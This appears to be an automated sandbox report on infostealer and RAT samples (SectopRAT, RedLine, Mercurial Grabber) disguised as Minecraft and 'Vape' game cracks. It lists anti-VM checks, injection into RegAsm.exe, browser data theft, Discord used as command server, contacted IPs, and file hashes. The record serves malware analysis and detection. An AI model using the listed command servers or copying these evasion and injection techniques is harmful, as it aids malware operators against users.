| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"
C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe
"C:\Users\Admin\AppData\Local\Temp\Minecraft_v4.5.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| RU | 109.248.201.150:63757 | tcp | |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| RU | 109.248.201.150:63757 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| RU | 109.248.201.150:63757 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| RU | 109.248.201.150:63757 | tcp | |
| RU | 109.248.201.150:63757 | tcp | |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
memory/2996-0-0x00000000753AE000-0x00000000753AF000-memory.dmp
memory/2996-1-0x0000000000AD0000-0x0000000000C14000-memory.dmp
memory/2996-2-0x0000000005B10000-0x00000000060B4000-memory.dmp
memory/2996-3-0x0000000005600000-0x0000000005692000-memory.dmp
memory/2996-5-0x00000000753A0000-0x0000000075B50000-memory.dmp
memory/2996-4-0x00000000056C0000-0x00000000056CA000-memory.dmp
memory/2996-6-0x00000000753AE000-0x00000000753AF000-memory.dmp
memory/2996-7-0x00000000753A0000-0x0000000075B50000-memory.dmp
memory/2996-8-0x0000000005740000-0x0000000005762000-memory.dmp
memory/2996-9-0x00000000057E0000-0x0000000005856000-memory.dmp
memory/2996-10-0x0000000005860000-0x000000000587E000-memory.dmp
memory/2180-11-0x0000000000400000-0x000000000041E000-memory.dmp
memory/2996-13-0x00000000753A0000-0x0000000075B50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Minecraft_v4.5.exe.log
| MD5 | fb3264819f05b468156e37fecd7ca1e7 |
| SHA1 | 8461be627ec2c21766472ac5a9215204f6cd03d6 |
| SHA256 | 902e22368b4d29d67c78eb445d67c7e36001a79c7701a1e171a9c7af457a739c |
| SHA512 | ddcb2a199799dc30a5627d6bb2aff30aca350b52e15f574ecc9e9e9e4d388fd1fe808b5fd2a8ea7015c91e369a06f045be455bf070c6d20d8c3b1c06de8ef964 |
memory/2180-15-0x00000000753A0000-0x0000000075B50000-memory.dmp
memory/2180-17-0x00000000051D0000-0x00000000051E2000-memory.dmp
memory/2180-16-0x0000000005790000-0x0000000005DA8000-memory.dmp
memory/2180-18-0x0000000005230000-0x000000000526C000-memory.dmp
memory/2180-19-0x0000000005270000-0x00000000052BC000-memory.dmp
memory/2180-20-0x00000000753A0000-0x0000000075B50000-memory.dmp
memory/2180-21-0x00000000054E0000-0x00000000055EA000-memory.dmp
memory/2180-22-0x00000000753A0000-0x0000000075B50000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
140s
Max time network
149s
Command Line
Signatures
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Bird.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Bird.exe
"C:\Users\Admin\AppData\Local\Temp\Bird.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| FI | 65.21.103.71:56458 | tcp | |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| FI | 65.21.103.71:56458 | tcp | |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.209.201.84.in-addr.arpa | udp |
| FI | 65.21.103.71:56458 | tcp | |
| FI | 65.21.103.71:56458 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| FI | 65.21.103.71:56458 | tcp | |
| FI | 65.21.103.71:56458 | tcp |
Files
memory/4156-0-0x0000000000780000-0x0000000000DDE000-memory.dmp
memory/4156-1-0x0000000076370000-0x0000000076371000-memory.dmp
memory/4156-2-0x0000000076350000-0x0000000076440000-memory.dmp
memory/4156-3-0x0000000076350000-0x0000000076440000-memory.dmp
memory/4156-4-0x0000000076350000-0x0000000076440000-memory.dmp
memory/4156-8-0x0000000000780000-0x0000000000DDE000-memory.dmp
memory/4156-9-0x0000000005FA0000-0x0000000006544000-memory.dmp
memory/4156-10-0x0000000006B70000-0x0000000007188000-memory.dmp
memory/4156-11-0x0000000005AD0000-0x0000000005B62000-memory.dmp
memory/4156-12-0x0000000005A80000-0x0000000005A92000-memory.dmp
memory/4156-13-0x0000000005BB0000-0x0000000005BEC000-memory.dmp
memory/4156-14-0x0000000005F10000-0x0000000005F5C000-memory.dmp
memory/4156-15-0x00000000069F0000-0x0000000006AFA000-memory.dmp
memory/4156-16-0x0000000000780000-0x0000000000DDE000-memory.dmp
memory/4156-17-0x0000000076370000-0x0000000076371000-memory.dmp
memory/4156-18-0x0000000076350000-0x0000000076440000-memory.dmp
memory/4156-19-0x0000000076350000-0x0000000076440000-memory.dmp
memory/4156-20-0x0000000076350000-0x0000000076440000-memory.dmp
memory/4156-21-0x0000000076350000-0x0000000076440000-memory.dmp
memory/4156-23-0x0000000076350000-0x0000000076440000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20240903-en
Max time kernel
136s
Max time network
149s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
System Binary Proxy Execution: Regsvcs/Regasm
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | N/A |
| Key opened | \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1636 set thread context of 11756 | N/A | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe
"C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8
C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 37.1.213.214:63028 | tcp | |
| US | 37.1.213.214:63028 | tcp | |
| US | 37.1.213.214:63028 | tcp | |
| US | 37.1.213.214:63028 | tcp |
Files
memory/1636-0-0x0000000074DCE000-0x0000000074DCF000-memory.dmp
memory/1636-1-0x0000000000350000-0x00000000003AC000-memory.dmp
memory/1636-2-0x0000000074DC0000-0x00000000754AE000-memory.dmp
memory/1200-5-0x0000000002970000-0x00000000029B0000-memory.dmp
memory/1636-6-0x0000000074DCE000-0x0000000074DCF000-memory.dmp
memory/1636-7-0x0000000074DC0000-0x00000000754AE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KRC02O6IUKGLZGQQE61M.temp
| MD5 | 17984f44880547c633aaa045d4cc8d28 |
| SHA1 | 018ef977dce56c2b143228f334002a87f7d1bb31 |
| SHA256 | 91349d976beb92ff111f28f378d7853e69287d6bf6a39e4a2444390df715300b |
| SHA512 | b7a44e89ccba516be6440992c9c1423f57b50d12d2de681f6eaa166116f070c4c6a735e47e7c45d639dd64a425c93c79d8463f7eeed885c97f8dfc3bdc3bf0d6 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | bad4aa35d2377b6a2906fadea728c258 |
| SHA1 | 813663aabd6cd88bdff1958e48b950dea5a19046 |
| SHA256 | 70c07d9167df0163ef649aae6c055c0504eb6dfc77755603cc8440d118aac3e5 |
| SHA512 | 93a102a177a5ecf6b6f58543d712e579505eb231542858dbe078ab46c3c971b11ccf461ea41a0bae8d7efdfb5f2f0e3683eb214dbd889da9ac562c5de383a6fe |
memory/1636-13-0x0000000004050000-0x00000000040A6000-memory.dmp
memory/1636-14-0x0000000004FC0000-0x0000000005040000-memory.dmp
memory/1636-40-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-78-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-76-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-74-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-72-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-70-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-68-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-66-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-64-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-62-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-60-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-58-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-56-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-54-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-52-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-50-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-48-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-46-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-44-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-42-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-38-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-36-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-34-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-32-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-30-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-28-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-26-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-24-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-22-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-20-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-18-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-16-0x0000000004FC0000-0x000000000503A000-memory.dmp
memory/1636-15-0x0000000004FC0000-0x000000000503A000-memory.dmp
\Users\Admin\AppData\Local\Temp\RegAsm.exe
| MD5 | b58b926c3574d28d5b7fdd2ca3ec30d5 |
| SHA1 | d260c4ffd603a9cfc057fcb83d678b1cecdf86f9 |
| SHA256 | 6e70b56d748c4ccab13cc8a055d3795ea0dd95fe3b70568d7d3ac0c6621140a3 |
| SHA512 | b13cb998822b716b695013bcd6dec62a2290567d0d1743b2d982ca084235cf69c6ea1fc91c9d4e62657c6f9e102c7c60e81296ab055ffe43b887c5f8ec8958ab |
memory/1636-2517-0x0000000074DC0000-0x00000000754AE000-memory.dmp
memory/11756-2516-0x0000000000400000-0x000000000041E000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win10v2004-20241007-en
Max time kernel
139s
Max time network
152s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
System Binary Proxy Execution: Regsvcs/Regasm
| Description | Indicator | Process | Target |
| Key opened | \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2228 set thread context of 6056 | N/A | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RegAsm.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe
"C:\Users\Admin\AppData\Local\Temp\Vape Crack.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection 8.8.8.8
C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dns.google | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.209.201.84.in-addr.arpa | udp |
| US | 37.1.213.214:63028 | tcp | |
| US | 37.1.213.214:63028 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 37.1.213.214:63028 | tcp | |
| US | 37.1.213.214:63028 | tcp |
Files
memory/2228-0-0x0000000074C9E000-0x0000000074C9F000-memory.dmp
memory/2228-1-0x0000000000870000-0x00000000008CC000-memory.dmp
memory/2228-2-0x00000000058A0000-0x0000000005E44000-memory.dmp
memory/2228-3-0x00000000052F0000-0x0000000005382000-memory.dmp
memory/2228-4-0x00000000052C0000-0x00000000052CA000-memory.dmp
memory/2228-5-0x0000000074C90000-0x0000000075440000-memory.dmp
memory/508-6-0x0000000002620000-0x0000000002656000-memory.dmp
memory/508-7-0x0000000074C90000-0x0000000075440000-memory.dmp
memory/508-8-0x0000000005240000-0x0000000005868000-memory.dmp
memory/508-9-0x0000000074C90000-0x0000000075440000-memory.dmp
memory/508-10-0x0000000074C90000-0x0000000075440000-memory.dmp
memory/508-11-0x0000000005170000-0x0000000005192000-memory.dmp
memory/508-13-0x00000000058E0000-0x0000000005946000-memory.dmp
memory/508-12-0x0000000005870000-0x00000000058D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1gn1pe0c.fyf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/508-14-0x0000000005950000-0x0000000005CA4000-memory.dmp
memory/508-24-0x0000000005F50000-0x0000000005F6E000-memory.dmp
memory/508-25-0x0000000005FD0000-0x000000000601C000-memory.dmp
memory/508-26-0x0000000006F30000-0x0000000006FC6000-memory.dmp
memory/508-27-0x0000000006420000-0x000000000643A000-memory.dmp
memory/508-28-0x0000000006470000-0x0000000006492000-memory.dmp
memory/508-29-0x00000000081B0000-0x000000000882A000-memory.dmp
memory/508-32-0x0000000074C90000-0x0000000075440000-memory.dmp
memory/2228-33-0x0000000074C9E000-0x0000000074C9F000-memory.dmp
memory/2228-34-0x0000000074C90000-0x0000000075440000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 6832ae680e8ddacc9752c84ff4ee94d5 |
| SHA1 | eba38e3a46f6a27ec29c567c6766ba57fe7954ba |
| SHA256 | 19c4f3bc855b449022b1baf50569236e2d844e3f323453291495de125f76e632 |
| SHA512 | 9cea7dcd3b0bf6bb6c1fd15aea43312cb52926e2e61455fcb26a6dd82323e352b9960f4afe412891be2aba54230ef354772e5397df8c6100e5aab875247fa1ef |
memory/944-36-0x0000000074C90000-0x0000000075440000-memory.dmp
memory/944-37-0x0000000074C90000-0x0000000075440000-memory.dmp
memory/944-47-0x00000000054F0000-0x0000000005844000-memory.dmp
memory/944-48-0x0000000074C90000-0x0000000075440000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 055d49baa3f0709efb430f24f1f50269 |
| SHA1 | d04930cf95b31ae01fbfaedc237447c3ec9a6121 |
| SHA256 | 93827dc1e9f7bbd451485b0b959c04df96a8b814c608373c166634c78aef27f4 |
| SHA512 | 838d417e29646ab93ac5d8ec4f698174a81391cf477889ea660b5b812aaf84860454c6b36725092085297ad892c976bb045f6a94df7477a98b08a94da28f6033 |
memory/944-51-0x0000000074C90000-0x0000000075440000-memory.dmp
memory/2228-52-0x00000000064C0000-0x0000000006516000-memory.dmp
memory/2228-53-0x0000000006510000-0x0000000006590000-memory.dmp
memory/2228-54-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-71-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-115-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-113-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-111-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-109-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-107-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-105-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-103-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-99-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-97-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-95-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-93-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-91-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-89-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-87-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-85-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-83-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-81-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-79-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-77-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-73-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-69-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-67-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-65-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-63-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-61-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-59-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-57-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-55-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-117-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-101-0x0000000006510000-0x000000000658A000-memory.dmp
memory/2228-75-0x0000000006510000-0x000000000658A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
| MD5 | 0d5df43af2916f47d00c1573797c1a13 |
| SHA1 | 230ab5559e806574d26b4c20847c368ed55483b0 |
| SHA256 | c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc |
| SHA512 | f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2 |
memory/2228-2543-0x0000000074C90000-0x0000000075440000-memory.dmp
memory/6056-2542-0x0000000000400000-0x000000000041E000-memory.dmp
memory/6056-2544-0x0000000005620000-0x0000000005C38000-memory.dmp
memory/6056-2545-0x0000000005060000-0x0000000005072000-memory.dmp
memory/6056-2546-0x0000000005100000-0x000000000513C000-memory.dmp
memory/6056-2547-0x0000000005140000-0x000000000518C000-memory.dmp
memory/6056-2548-0x00000000053B0000-0x00000000054BA000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-09 16:28
Reported
2024-11-09 16:31
Platform
win7-20240903-en
Max time kernel
117s
Max time network
121s
Command Line
Signatures
Mercurial Grabber Stealer
Mercurialgrabber family
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Vape_V4.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip4.seeip.org | N/A | N/A |
